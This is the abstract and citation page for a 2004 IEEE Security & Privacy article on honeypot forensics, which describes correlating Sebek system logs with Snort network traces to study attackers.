Issue No.04 - July-August (2004 vol.2)
Yann Berthier , Herv? Schauer Consultant
Frederic Raynal , MISC Magazine
Danielle Kaminsky , TEGAM International
DOI Bookmark: http://doi.ieeecomputersociety.org/10.1109/MSP.2004.47
A major goal of honeypot research is to improve our knowledge of blackhats from two perspectives: technical and ethnological. For the former, we want new ways to discover rootkits, trojans, and potential zero-day exploits (although capturing zero-day exploits in a honeypot is an unusual event). For the latter, we want a better understanding of the areas of interest and hidden links between blackhat teams. One way to achieve these goals is to increase the verbosity of our honeypot logs and traces; the most common tools for doing this are Sebek (http://project.honeynet.org/tools/sebek/) for system events and Snort (www.snort.org) for network activity. Unfortunately, there is no easy way to correlate information from these sources, which complicates honeypot forensics.
honeynets, honeypots, blackhat
Yann Berthier, Frederic Raynal, Danielle Kaminsky, "Honeypot Forensics Part I: Analyzing the Network", IEEE Security & Privacy, vol.2, no. 4, pp. 72-78, July-August 2004, doi:10.1109/MSP.2004.47